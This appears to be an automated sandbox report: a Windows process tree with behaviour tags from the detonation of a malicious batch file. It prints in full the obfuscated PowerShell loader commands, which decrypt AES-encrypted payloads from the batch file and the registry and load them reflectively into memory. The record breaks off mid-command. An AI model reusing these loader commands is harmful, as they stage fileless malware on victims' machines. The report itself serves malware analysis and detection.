C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1184
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2948
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3256
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3540
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3580
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2660
-
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ESXom = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($nboag in $ESXom) { if ($nboag.StartsWith(':: ')) { $BVaSZ = $nboag.Substring(3); break; }; };$kCmVw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($BVaSZ);$eLFSC = New-Object System.Security.Cryptography.AesManaged;$eLFSC.Mode = [System.Security.Cryptography.CipherMode]::CBC;$eLFSC.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$eLFSC.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5l57QE5S9Q7zd5+Bh+XnYYwwzIwQ2OWrX6FXvhoqhNU=');$eLFSC.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X69qeK5Q4la2LJmbSRyhJQ==');$SCino = $eLFSC.CreateDecryptor();$kCmVw = $SCino.TransformFinalBlock($kCmVw, 0, $kCmVw.Length);$SCino.Dispose();$eLFSC.Dispose();$GnclG = New-Object System.IO.MemoryStream(, $kCmVw);$kxUUr = New-Object System.IO.MemoryStream;$vPwQV = New-Object System.IO.Compression.GZipStream($GnclG, [IO.Compression.CompressionMode]::Decompress);$vPwQV.CopyTo($kxUUr);$vPwQV.Dispose();$GnclG.Dispose();$kxUUr.Dispose();$kCmVw = $kxUUr.ToArray();$pGoAa = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($kCmVw);$ZaIus = $pGoAa.EntryPoint;$ZaIus.Invoke($null, (, [string[]] ('')))3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1600).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = 